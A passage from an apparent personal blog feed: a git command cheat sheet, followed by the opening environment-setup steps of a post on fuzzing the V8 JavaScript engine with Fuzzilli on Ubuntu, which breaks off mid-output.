<h5 id="显示与上次提交版本文件的不同:"><a href="#显示与上次提交版本文件的不同:" class="headerlink" title="显示与上次提交版本文件的不同:"></a>Show changes relative to the last committed version:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git diff</span><br></pre></td></tr></table></figure><h5 id="把当前所有修改添加到下次提交中:"><a href="#把当前所有修改添加到下次提交中:" class="headerlink" title="把当前所有修改添加到下次提交中:"></a>Add all current changes to the next commit:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git add .</span><br></pre></td></tr></table></figure><h5 id="把对某个文件的修改添加到下次提交中:"><a href="#把对某个文件的修改添加到下次提交中:" class="headerlink" title="把对某个文件的修改添加到下次提交中:"></a>Add the changes to a specific file to the next commit:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git add -p <file></span><br></pre></td></tr></table></figure><h5 id="提交本地的所有修改:"><a href="#提交本地的所有修改:" class="headerlink" title="提交本地的所有修改:"></a>Commit all local changes:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git commit -a</span><br></pre></td></tr></table></figure><h5 id="提交之前已标记的变化:"><a href="#提交之前已标记的变化:" class="headerlink" title="提交之前已标记的变化:"></a>Commit previously staged changes:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git commit</span><br></pre></td></tr></table></figure><h5 id="附加消息提交:"><a href="#附加消息提交:" class="headerlink" title="附加消息提交:"></a>Commit with a message:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git commit -m 'message here'</span><br></pre></td></tr></table></figure>
<h5 id="提交,并将提交时间设置为之前的某个日期"><a href="#提交,并将提交时间设置为之前的某个日期" class="headerlink" title="提交,并将提交时间设置为之前的某个日期:"></a>Commit, setting the commit time to an earlier date:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git commit --date="`date --date='n day ago'`" -am "Commit Message"</span><br></pre></td></tr></table></figure><h5 id="修改上次提交"><a href="#修改上次提交" class="headerlink" title="修改上次提交"></a>Amend the last commit</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git commit --amend</span><br></pre></td></tr></table></figure><h5 id="修改上次提交的committer-date:"><a href="#修改上次提交的committer-date:" class="headerlink" title="修改上次提交的committer date:"></a>Change the committer date of the last commit:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GIT_COMMITTER_DATE="date" git commit --amend</span><br></pre></td></tr></table></figure><h5 id="修改上次提交的author-date:"><a href="#修改上次提交的author-date:" class="headerlink" title="修改上次提交的author date:"></a>Change the author date of the last commit:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git commit --amend --date="date"</span><br></pre></td></tr></table></figure><h5 id="把当前分支中未提交的修改移动到其他分支:"><a href="#把当前分支中未提交的修改移动到其他分支:" class="headerlink" title="把当前分支中未提交的修改移动到其他分支:"></a>Move uncommitted changes on the current branch to another branch:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">git stash</span><br><span class="line">git checkout branch2</span><br><span class="line">git stash pop</span><br></pre></td></tr></table></figure>
<h5 id="将-stashed-changes-应用到当前分支:"><a href="#将-stashed-changes-应用到当前分支:" class="headerlink" title="将 stashed changes 应用到当前分支:"></a>Apply stashed changes to the current branch:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git stash apply</span><br></pre></td></tr></table></figure><h5 id="删除最新一次的-stashed-changes:"><a href="#删除最新一次的-stashed-changes:" class="headerlink" title="删除最新一次的 stashed changes:"></a>Drop the most recent stashed changes:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git stash drop</span><br></pre></td></tr></table></figure><p><strong>Copy the changes from a bug-fix commit to the current branch</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git cherry-pick <commit></span><br></pre></td></tr></table></figure><h4 id="搜索"><a href="#搜索" class="headerlink" title="搜索"></a>Search</h4><h5 id="从当前目录的所有文件中查找文本内容:"><a href="#从当前目录的所有文件中查找文本内容:" class="headerlink" title="从当前目录的所有文件中查找文本内容:"></a>Search for text in all files in the current directory:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git grep "Hello"</span><br></pre></td></tr></table></figure><h5 id="在某一版本中搜索文本:"><a href="#在某一版本中搜索文本:" class="headerlink" title="在某一版本中搜索文本:"></a>Search for text in a specific version:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git grep "Hello" v2.5</span><br></pre></td></tr></table></figure><h4 id="提交历史"><a href="#提交历史" class="headerlink" title="提交历史"></a>Commit history</h4>
<h5 id="从最新提交开始,显示所有的提交记录(显示hash,-作者信息,提交的标题和时间):"><a href="#从最新提交开始,显示所有的提交记录(显示hash,-作者信息,提交的标题和时间):" class="headerlink" title="从最新提交开始,显示所有的提交记录(显示hash, 作者信息,提交的标题和时间):"></a>Show all commits starting from the newest (hash, author, subject and date):</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git log</span><br></pre></td></tr></table></figure><h5 id="显示所有提交(仅显示提交的hash和message):"><a href="#显示所有提交(仅显示提交的hash和message):" class="headerlink" title="显示所有提交(仅显示提交的hash和message):"></a>Show all commits (hash and message only):</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git log --oneline</span><br></pre></td></tr></table></figure><h5 id="显示某个用户的所有提交:"><a href="#显示某个用户的所有提交:" class="headerlink" title="显示某个用户的所有提交:"></a>Show all commits by a given user:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git log --author="username"</span><br></pre></td></tr></table></figure><h5 id="显示某个文件的所有修改:"><a href="#显示某个文件的所有修改:" class="headerlink" title="显示某个文件的所有修改:"></a>Show all changes to a given file:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git log -p <file></span><br></pre></td></tr></table></figure><h5 id="仅显示远端-lt-remote-master-gt-分支与远端-lt-origin-master-gt-分支提交记录的差集:"><a href="#仅显示远端-lt-remote-master-gt-分支与远端-lt-origin-master-gt-分支提交记录的差集:" class="headerlink" title="仅显示远端<remote/master>分支与远端<origin/master>分支提交记录的差集:"></a>Show only the commits that differ between the remote <remote/master> branch and the remote <origin/master> branch:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git log --oneline <origin/master>..<remote/master> --left-right</span><br></pre></td></tr></table></figure>
<h5 id="谁,在什么时间,修改了文件的什么内容:"><a href="#谁,在什么时间,修改了文件的什么内容:" class="headerlink" title="谁,在什么时间,修改了文件的什么内容:"></a>Who changed what in a file, and when:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git blame <file></span><br></pre></td></tr></table></figure><h5 id="显示reflog:"><a href="#显示reflog:" class="headerlink" title="显示reflog:"></a>Show the reflog:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git reflog show</span><br></pre></td></tr></table></figure><h5 id="删除reflog:"><a href="#删除reflog:" class="headerlink" title="删除reflog:"></a>Delete the reflog:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git reflog delete</span><br></pre></td></tr></table></figure><h4 id="分支与标签"><a href="#分支与标签" class="headerlink" title="分支与标签"></a>Branches and tags</h4><h5 id="列出所有的分支:"><a href="#列出所有的分支:" class="headerlink" title="列出所有的分支:"></a>List all branches:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git branch</span><br></pre></td></tr></table></figure><h5 id="列出所有的远端分支:"><a href="#列出所有的远端分支:" class="headerlink" title="列出所有的远端分支:"></a>List all remote branches:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git branch -r</span><br></pre></td></tr></table></figure><h5 id="切换分支:"><a href="#切换分支:" class="headerlink" title="切换分支:"></a>Switch branch:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git checkout <branch></span><br></pre></td></tr></table></figure>
<h5 id="创建并切换到新分支"><a href="#创建并切换到新分支" class="headerlink" title="创建并切换到新分支:"></a>Create and switch to a new branch:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git checkout -b <branch></span><br></pre></td></tr></table></figure><h5 id="基于当前分支创建新分支:"><a href="#基于当前分支创建新分支:" class="headerlink" title="基于当前分支创建新分支:"></a>Create a new branch based on the current branch:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git branch <new-branch></span><br></pre></td></tr></table></figure><h5 id="基于远程分支创建新的可追溯的分支:"><a href="#基于远程分支创建新的可追溯的分支:" class="headerlink" title="基于远程分支创建新的可追溯的分支:"></a>Create a new tracking branch based on a remote branch:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git branch --track <new-branch> <remote-branch></span><br></pre></td></tr></table></figure><h5 id="删除本地分支"><a href="#删除本地分支" class="headerlink" title="删除本地分支:"></a>Delete a local branch:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git branch -d <branch></span><br></pre></td></tr></table></figure><h5 id="强制删除一个本地分支:"><a href="#强制删除一个本地分支:" class="headerlink" title="强制删除一个本地分支:"></a>Force-delete a local branch:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git branch -D <branch></span><br></pre></td></tr></table></figure><h5 id="给当前版本打标签:"><a href="#给当前版本打标签:" class="headerlink" title="给当前版本打标签:"></a>Tag the current version:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git tag <tag-name></span><br></pre></td></tr></table></figure>
<h5 id="给当前版本打标签并附加消息:"><a href="#给当前版本打标签并附加消息:" class="headerlink" title="给当前版本打标签并附加消息:"></a>Tag the current version with a message:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git tag -a <tag-name></span><br></pre></td></tr></table></figure><hr><h4 id="更新与发布"><a href="#更新与发布" class="headerlink" title="更新与发布"></a>Update and publish</h4><h5 id="列出当前配置的远程端:"><a href="#列出当前配置的远程端:" class="headerlink" title="列出当前配置的远程端:"></a>List the currently configured remotes:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git remote -v</span><br></pre></td></tr></table></figure><h5 id="显示远程端的信息:"><a href="#显示远程端的信息:" class="headerlink" title="显示远程端的信息:"></a>Show information about a remote:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git remote show <remote></span><br></pre></td></tr></table></figure><h5 id="添加新的远程端:"><a href="#添加新的远程端:" class="headerlink" title="添加新的远程端:"></a>Add a new remote:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git remote add <remote> <url></span><br></pre></td></tr></table></figure><h5 id="下载远程端版本,但不合并到HEAD中:"><a href="#下载远程端版本,但不合并到HEAD中:" class="headerlink" title="下载远程端版本,但不合并到HEAD中:"></a>Download the remote version without merging it into HEAD:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git fetch <remote></span><br></pre></td></tr></table></figure><h5 id="下载远程端版本,并自动与HEAD版本合并:"><a href="#下载远程端版本,并自动与HEAD版本合并:" class="headerlink" title="下载远程端版本,并自动与HEAD版本合并:"></a>Download the remote version and merge it into HEAD automatically:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git pull <remote> <branch></span><br></pre></td></tr></table></figure>
<h5 id="将远程端版本合并到本地版本中:"><a href="#将远程端版本合并到本地版本中:" class="headerlink" title="将远程端版本合并到本地版本中:"></a>Merge the remote version into the local version:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git pull origin master</span><br></pre></td></tr></table></figure><h5 id="以rebase方式将远端分支与本地合并:"><a href="#以rebase方式将远端分支与本地合并:" class="headerlink" title="以rebase方式将远端分支与本地合并:"></a>Merge the remote branch into the local one by rebasing:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git pull --rebase <remote> <branch></span><br></pre></td></tr></table></figure><h5 id="将本地版本发布到远程端:"><a href="#将本地版本发布到远程端:" class="headerlink" title="将本地版本发布到远程端:"></a>Publish the local version to the remote:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git push <remote> <branch></span><br></pre></td></tr></table></figure><h5 id="删除远程端分支:"><a href="#删除远程端分支:" class="headerlink" title="删除远程端分支:"></a>Delete a remote branch:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ git push <remote> :<branch> (since Git v1.5.0)</span><br><span class="line">or</span><br><span class="line">git push <remote> --delete <branch> (since Git v1.7.0)</span><br></pre></td></tr></table></figure><h5 id="发布标签"><a href="#发布标签" class="headerlink" title="发布标签:"></a>Publish tags:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git push --tags</span><br></pre></td></tr></table></figure>
<h4 id="合并与重置-Rebase"><a href="#合并与重置-Rebase" class="headerlink" title="合并与重置(Rebase)"></a>Merge and rebase</h4><h5 id="将分支合并到当前HEAD中:"><a href="#将分支合并到当前HEAD中:" class="headerlink" title="将分支合并到当前HEAD中:"></a>Merge a branch into the current HEAD:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git merge <branch></span><br></pre></td></tr></table></figure><h5 id="将当前HEAD版本重置到分支中"><a href="#将当前HEAD版本重置到分支中" class="headerlink" title="将当前HEAD版本重置到分支中:"></a>Rebase the current HEAD onto a branch:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git rebase <branch></span><br></pre></td></tr></table></figure><h5 id="退出重置"><a href="#退出重置" class="headerlink" title="退出重置:"></a>Abort the rebase:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git rebase --abort</span><br></pre></td></tr></table></figure><h5 id="解决冲突后继续重置:"><a href="#解决冲突后继续重置:" class="headerlink" title="解决冲突后继续重置:"></a>Continue the rebase after resolving conflicts:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git rebase --continue</span><br></pre></td></tr></table></figure><h5 id="使用配置好的merge-tool-解决冲突:"><a href="#使用配置好的merge-tool-解决冲突:" class="headerlink" title="使用配置好的merge tool 解决冲突:"></a>Resolve conflicts with the configured merge tool:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git mergetool</span><br></pre></td></tr></table></figure><h5 id="在编辑器中手动解决冲突后,标记文件为已解决冲突:"><a href="#在编辑器中手动解决冲突后,标记文件为已解决冲突:" class="headerlink" title="在编辑器中手动解决冲突后,标记文件为已解决冲突:"></a>After resolving conflicts by hand in an editor, mark the file as <code>resolved</code>:</h5>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git add <resolved-file></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git rm <resolved-file></span><br></pre></td></tr></table></figure><h5 id="合并提交:"><a href="#合并提交:" class="headerlink" title="合并提交:"></a>Squash commits:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git rebase -i <commit-just-before-first></span><br></pre></td></tr></table></figure><p>In the editor that opens, replace the first block with the second:</p><p>Original:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">pick <commit_id></span><br><span class="line">pick <commit_id2></span><br><span class="line">pick <commit_id3></span><br></pre></td></tr></table></figure><p>Replace with:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">pick <commit_id></span><br><span class="line">squash <commit_id2></span><br><span class="line">squash <commit_id3></span><br></pre></td></tr></table></figure><h4 id="撤销"><a href="#撤销" class="headerlink" title="撤销"></a>Undo</h4><h5 id="放弃工作目录下的所有修改:"><a href="#放弃工作目录下的所有修改:" class="headerlink" title="放弃工作目录下的所有修改:"></a>Discard all changes in the working directory:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git reset --hard HEAD</span><br></pre></td></tr></table></figure><h5 id="移除缓存区的所有文件(i-e-撤销上次git-add)"><a href="#移除缓存区的所有文件(i-e-撤销上次git-add)" class="headerlink" title="移除缓存区的所有文件(i.e. 撤销上次git add):"></a>Remove all files from the staging area (i.e. undo the last <code>git add</code>):</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git reset HEAD</span><br></pre></td></tr></table></figure>
<h5 id="放弃某个文件的所有本地修改:"><a href="#放弃某个文件的所有本地修改:" class="headerlink" title="放弃某个文件的所有本地修改:"></a>Discard all local changes to a file:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git checkout HEAD <file></span><br></pre></td></tr></table></figure><h5 id="重置一个提交(通过创建一个截然不同的新提交)"><a href="#重置一个提交(通过创建一个截然不同的新提交)" class="headerlink" title="重置一个提交(通过创建一个截然不同的新提交)"></a>Revert a commit (by creating a new commit with the inverse changes)</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git revert <commit></span><br></pre></td></tr></table></figure><h5 id="将HEAD重置到指定的版本,并抛弃该版本之后的所有修改:"><a href="#将HEAD重置到指定的版本,并抛弃该版本之后的所有修改:" class="headerlink" title="将HEAD重置到指定的版本,并抛弃该版本之后的所有修改:"></a>Reset HEAD to the given version and discard all changes after it:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git reset --hard <commit></span><br></pre></td></tr></table></figure><h5 id="用远端分支强制覆盖本地分支:"><a href="#用远端分支强制覆盖本地分支:" class="headerlink" title="用远端分支强制覆盖本地分支:"></a>Force-overwrite the local branch with the remote branch:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git reset --hard <remote/branch> e.g., upstream/master, origin/my-feature</span><br></pre></td></tr></table></figure><h5 id="将HEAD重置到上一次提交的版本,并将之后的修改标记为未添加到缓存区的修改:"><a href="#将HEAD重置到上一次提交的版本,并将之后的修改标记为未添加到缓存区的修改:" class="headerlink" title="将HEAD重置到上一次提交的版本,并将之后的修改标记为未添加到缓存区的修改:"></a>Reset HEAD to a previous version and keep the later changes as unstaged modifications:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git reset <commit></span><br></pre></td></tr></table></figure>
<h5 id="将HEAD重置到上一次提交的版本,并保留未提交的本地修改:"><a href="#将HEAD重置到上一次提交的版本,并保留未提交的本地修改:" class="headerlink" title="将HEAD重置到上一次提交的版本,并保留未提交的本地修改:"></a>Reset HEAD to a previous version and preserve uncommitted local changes:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ git reset --keep <commit></span><br></pre></td></tr></table></figure><h5 id="删除添加-gitignore文件前错误提交的文件:"><a href="#删除添加-gitignore文件前错误提交的文件:" class="headerlink" title="删除添加.gitignore文件前错误提交的文件:"></a>Remove files that were mistakenly committed before <code>.gitignore</code> was added:</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ git rm -r --cached .</span><br><span class="line">$ git add .</span><br><span class="line">$ git commit -m "remove xyz file"</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><p>I wrote this article at my previous job and am sharing it now in the hope that it helps someone ;)</p>
<p>The <a href="https://git-scm.com/docs/">official documentation</a> is handy for reference~</p></summary>
<category term="CI/CD" scheme="https://f23y.github.io/categories/CI-CD/"/>
<category term="Git" scheme="https://f23y.github.io/tags/Git/"/>
</entry>
<entry>
<title>Fuzzing101 V8</title>
<link href="https://f23y.github.io/2023/06/09/Fuzzing101%20V8/"/>
<id>https://f23y.github.io/2023/06/09/Fuzzing101%20V8/</id>
<published>2023-06-08T15:14:33.000Z</published>
<updated>2025-09-27T10:59:12.314Z</updated>
<content type="html"><![CDATA[<p><a href="https://github.com/antonio-morales/Fuzzing101/tree/main/Exercise%2010">https://github.com/antonio-morales/Fuzzing101/tree/main/Exercise%2010</a></p><p><strong>Note!!!</strong> Fuzzilli-0.9 is an unsuccessful attempt. It is recommended to start directly with the latest version of Fuzzilli (starting from the “Let’s Fuzz!” section).</p><p>System: Ubuntu 20.04 LTS</p><span id="more"></span><h2 id="Environment-Configuration"><a href="#Environment-Configuration" class="headerlink" title="Environment Configuration"></a>Environment Configuration</h2><h3 id="Fuzzilli-0-9"><a href="#Fuzzilli-0-9" class="headerlink" title="Fuzzilli-0.9"></a>Fuzzilli-0.9</h3><p>Running the following command produces an error because libcurl3 and libcurl4 conflict; just remove libcurl3 from the package list and follow the prompts to finish the installation.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~$ sudo apt --yes install clang libcurl3 libpython2.7 libpython2.7-dev libcurl4 git</span><br><span class="line">Reading package lists... Done</span><br><span class="line">Building dependency tree </span><br><span class="line">Reading state information... Done</span><br><span class="line">Package libcurl3 is not available, but is referred to by another package.</span><br><span class="line">This may mean that the package is missing, has been obsoleted, or</span><br><span class="line">is only available from another <span class="built_in">source</span></span><br><span class="line">However the following packages replace it:</span><br><span class="line"> libcurl4:i386 libcurl4</span><br><span class="line"></span><br><span class="line">E: Package <span class="string">'libcurl3'</span> has no installation candidate</span><br></pre></td></tr></table></figure><p>The next step fails as well: installing libncurses5 resolves the first missing library, but rerunning the build reports another one.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~/fuzzilli-0.9$ swift build -c release -Xlinker=<span class="string">'-lrt'</span></span><br><span class="line">swift: error <span class="keyword">while</span> loading shared libraries: libtinfo.so.5: cannot open shared object file: No such file or directory</span><br><span class="line">fr3y@ubuntu:~$ sudo apt install libncurses5</span><br><span class="line">fr3y@ubuntu:~/fuzzilli-0.9$ swift build -c release -Xlinker=<span class="string">'-lrt'</span></span><br><span class="line">/usr/share/swift/usr/bin/swift-build: error <span class="keyword">while</span> loading shared libraries: libicuuc.so.60: cannot open shared object file: No such file or directory</span><br></pre></td></tr></table></figure><p>Installing the libicu60 package below fixes that; also make sure clang is installed.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span 
class="line"><span class="built_in">cd</span> ~/Downloads</span><br><span class="line">wget http://security.ubuntu.com/ubuntu/pool/main/i/icu/libicu60_60.2-3ubuntu3.2_amd64.deb</span><br><span class="line">sudo apt-get install ./libicu60_60.2-3ubuntu3.2_amd64.deb</span><br></pre></td></tr></table></figure><p>Successfully installed fuzzilli…</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~/fuzzilli-0.9$ swift build -c release -Xlinker=<span class="string">'-lrt'</span></span><br><span class="line">Compile libsocket socket.c</span><br><span class="line">Compile libreprl libreprl.c</span><br><span class="line">Compile libforkserver forkserver.c</span><br><span class="line">Compile libcoverage coverage.c</span><br><span class="line">Compile Swift Module <span class="string">'Fuzzilli'</span> (60 sources)</span><br><span class="line">Compile Swift Module <span class="string">'FuzzilliCli'</span> (8 sources)</span><br><span class="line">Linking ./.build/x86_64-unknown-linux/release/FuzzilliCli</span><br></pre></td></tr></table></figure><p>Then follow the steps to get V8 source code.</p><p>Compile V8 with coverage instrumentation.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~/v8$ cp /home/fr3y/fuzzilli-0.9/Targets/V8/v8.patch ./</span><br><span class="line">fr3y@ubuntu:~/v8$ gn gen out/fuzzbuild --args=<span class="string">'is_debug=false dcheck_always_on=true 
v8_static_library=true v8_enable_slow_dchecks=true v8_enable_v8_checks=true v8_enable_verify_heap=true v8_enable_verify_csa=true v8_enable_verify_predictable=true sanitizer_coverage_flags="trace-pc-guard" target_cpu="x64"'</span></span><br><span class="line">Done. Made 122 targets from 81 files <span class="keyword">in</span> 185ms</span><br><span class="line">fr3y@ubuntu:~/v8$ ninja -C ./out/fuzzbuild</span><br><span class="line">ninja: Entering directory `./out/fuzzbuild<span class="string">'</span></span><br><span class="line"><span class="string">[1711/1711] STAMP obj/gn_all.stamp</span></span><br></pre></td></tr></table></figure><p>Whether the old Fuzzilli, Swift or V8 is used, the run eventually fails with the error below. This could probably be solved by reinstalling all of them at matching versions, but I will simply use the latest versions here.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[REPRL] Failed to communicate with child process</span><br></pre></td></tr></table></figure><h3 id="Let’s-Fuzz"><a href="#Let’s-Fuzz" class="headerlink" title="Let’s Fuzz!"></a>Let’s Fuzz!</h3><h4 id="Build-V8"><a href="#Build-V8" class="headerlink" title="Build V8"></a>Build V8</h4><ol><li>Install dependencies: <code>fr3y@ubuntu:~/v8$ ./build/install-build-deps.sh -no-chromeos-fonts</code></li><li>Use gn to generate build files: <code>fr3y@ubuntu:~/v8$ gn gen out/Release "--args=is_debug=false"</code></li><li>Compile: <code>fr3y@ubuntu:~/v8$ ninja -C out/Release</code></li><li>Check the d8 binary:</li></ol><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">fr3y@ubuntu:~/v8$ ./out/Release/d8 ./<span class="built_in">test</span>/fuzzer/parser/hello-world</span><br><span class="line">hello 
